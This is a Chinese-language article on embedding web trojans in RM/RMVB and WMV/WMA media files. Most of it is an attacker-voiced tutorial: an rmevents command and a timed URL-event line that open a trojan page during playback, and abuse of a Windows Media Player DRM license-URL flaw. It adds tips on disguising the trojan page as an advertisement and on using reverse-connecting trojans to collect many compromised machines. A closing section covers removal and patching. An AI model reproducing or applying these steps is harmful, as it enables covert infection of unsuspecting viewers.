如今網(wǎng)絡(luò)上流傳最為廣泛的媒體文件有兩類，一類是RM、RMVB文件，另一類是WMV、WMA文件，由于它們對流媒體的良好支持，使網(wǎng)絡(luò)上的電影、音樂等媒體文件幾乎都采用了這兩種媒體文件格式，因此，如果在媒體文件中植入木馬，那么媒體文件中木馬獨(dú)有的隱蔽性將會使受害者在不知不覺中被網(wǎng)頁木馬侵害，危害性可見一斑。

　　RM、RMVB中加入木馬

　　Helix Producer Plus是一款圖形化的專業(yè)流媒體文件制作工具，我們可以利用Helix Producer Plus這款軟件把其他格式的文件轉(zhuǎn)換成RM或RMVB格式，當(dāng)然也可以對已存在的RM文件進(jìn)行重新編輯，在編輯的同時，我們可以把事先準(zhǔn)備好的網(wǎng)頁木馬插入其中。這樣只要一打開這個編輯好的媒體文件，插入在其中的網(wǎng)頁木馬也會隨之打開，我們甚至還能控制網(wǎng)頁木馬打開的時間，讓網(wǎng)頁木馬更隱蔽。

　　步驟1:首先下載Helix Producer Plus，一路“Next”完成安裝，然后我們要找一個能把網(wǎng)頁木馬插入其中的RM電影文件，把它改名為film.rm，然后拷貝到Helix Producer Plus安裝目錄的RealMediaEditor文件夾下。

　　步驟2:我們在這個文件夾中新建一個文本文檔，命名為test.txt，在test.txt文件中寫入這樣一句命令:“u 00:07:00 00:07:30 http://www.***.com/in

　　dex.php”，這句命令的意思是當(dāng)媒體文件播放到第7分鐘后觸發(fā)打開URL事件，然后到7分30秒的時候事件結(jié)束，最后面的就是URL的網(wǎng)址，我們可以把這個網(wǎng)址改成我們的網(wǎng)頁木馬的地址(關(guān)于網(wǎng)頁木馬的制作和設(shè)置已經(jīng)多次介紹，在此不再重復(fù))，這樣便可以在別人看媒體文件的時候打開網(wǎng)頁木馬，讓他不知不覺中招(如圖1)。

　　小提示:對于制作的網(wǎng)頁木馬應(yīng)盡量隱蔽，并模仿正常網(wǎng)頁，否則在看媒體文件時突然彈出網(wǎng)頁誰都會有疑心，當(dāng)然把它做成類似的廣告網(wǎng)頁效果最好，別人會以為是廣告，便一關(guān)了之，而這時我們已經(jīng)種馬成功了。對于木馬的選擇應(yīng)盡量使用具有反向連接的木馬，如灰鴿子，否則即使有了上百的肉雞，一個一個去連接也是很麻煩的。

　　步驟3:運(yùn)行CMD(命令提示符)，進(jìn)入RealMediaEditor文件夾，輸入命令:“rmevents -i film.rm -e test.txt -o film2.rm”，這是最關(guān)鍵的一步，意思是利用Helix Producer Plus自帶的rmevents.exe把test.txt這個觸發(fā)URL事件合并到film.rm中，并另存為film2.rm。這個新生成的film2.rm便是我們需要的帶有網(wǎng)頁木馬的媒體文件(如圖2)。

　　WMV、WMA中加入木馬

　　對于WMA、WMV文件，我們可以利用其默認(rèn)的播放器Windows Media Player的“Microsoft Windows媒體播放器數(shù)字權(quán)限管理加載任意網(wǎng)頁漏洞”來插入木馬。當(dāng)我們播放已經(jīng)插入木馬的惡意文件時，播放器首先會彈出一個提示窗口，說明此文件經(jīng)過DRM加密需要通過URL驗(yàn)證證書，而這個URL就是我們事先設(shè)置好的網(wǎng)頁木馬地址，當(dāng)用戶點(diǎn)擊“是”進(jìn)行驗(yàn)證時，我們便種馬成功了。和RM文件種馬一樣，在WMV文件中插入木馬我們還需要一樣工具――WMDRM打包加密器，這是一款可以對WMA、WMV進(jìn)行DRM加密的文件，軟件本身是為了保護(hù)媒體文件的版權(quán)，但在攻擊者手中，便成了黑客的幫兇。

　　安裝“WMDRM打包加密器”，完成后運(yùn)行，軟件界面很簡潔(如圖3)。首先出現(xiàn)的是“自定義打包”標(biāo)簽，我們點(diǎn)擊“源文件”右邊的瀏覽按鈕，選擇一個WMA或WMV文件，然后我們在下面的“輸出目錄”里選擇生成惡意文件的保存路徑，然后在“輸出文件后綴” 中填入生成的文件后綴，建議和源文件保持一致。完成后我們切換到“認(rèn)證字符串”標(biāo)簽， 在“認(rèn)證URL”欄里輸入我們的網(wǎng)頁木馬地址，如:http://www.***.com/index.php,其他保持默認(rèn)即可。再切換到“自定義打包”標(biāo)簽，點(diǎn)擊“打包加密’按鈕，植有網(wǎng)頁木馬的惡意媒體文件就生成了。

　　當(dāng)用戶打開這個惡意媒體文件時，Windows Media Player會要求你獲取證書(如圖4)，點(diǎn)擊“確定”后就會彈出我們的網(wǎng)頁木馬。

　　有攻就有防，我們不能坐以待斃，任其宰割，其實(shí)惡意媒體文件不是我們想象中的那么神秘，只要我們掌握好一些清除網(wǎng)頁木馬的小知識,就可以完全阻止網(wǎng)頁木馬運(yùn)行。

　　RM、RMVB木馬清除方法

　　我們以上文中制作RM木馬的方法為例，新建一個內(nèi)容為空的文本文件test.txt，然后在CMD中運(yùn)行“rmevents -i 存在木馬的媒體文件.rm -e test.txt -o film.rm”，這樣便可以利用與插入木馬相同的辦法把觸發(fā)URL事件覆蓋掉，這時輸出的film.rm便是不存在木馬的干凈媒體文件了。

　　如果對命令提示符的使用不熟悉，我們使用Helix RealMedia Editor來清除其中的網(wǎng)頁木馬。打開RealMediaEditor文件夾下的rmevents.exe文件，其界面如圖5所示，同樣新建一個內(nèi)容為空的test.txt，然后在Helix RealMedia Editor的菜單欄中點(diǎn)擊“Tools”，選擇其中的“Merge Events”。接著選擇我們剛才創(chuàng)建的test.txt，點(diǎn)擊“確定”。最后選擇“File”菜單中的“Save RealMedia File”保存媒體文件即可，其原理和利用rmevents.exe清除網(wǎng)頁木馬的原理是一樣的。

　　WMA、WMV木馬清除方法

　　由于這是利用了Windows Media Player的漏洞，因此我們不能清除媒體文件中的惡意DRM加密信息，我們唯一可以做的就是打好補(bǔ)丁，惡意WMA、WMV文件對打過補(bǔ)丁的Windows Media Player將不起作用。補(bǔ)丁下載地址:http://www.microsoft.com/technethttp://security.chinaitlab.com/

　　此外，我們還可以選擇其他的播放器來播放媒體文件，如暴風(fēng)影音、Mplayer等，一些在媒體文件中插入網(wǎng)頁木馬事件的功能在它們面前將不起作用，因此這樣也可以在一定程度上防范媒體網(wǎng)頁木馬。

　　安全在很大程度上取決于用戶的安全意識，只有提高安全意識才能減少中招的概率，比如不打開陌生的媒體文件，不隨意進(jìn)入陌生的網(wǎng)站等，當(dāng)然光有安全意識還不夠，我們還需要?dú)⒍拒浖�等好幫手，畢竟任何網(wǎng)頁木馬都需要先下載到本地才能運(yùn)行，而殺毒軟件可以防止木馬的運(yùn)行，因此我們必須及時升級殺毒軟件的病毒庫。只有防先于攻，才能算得上是真正的安全。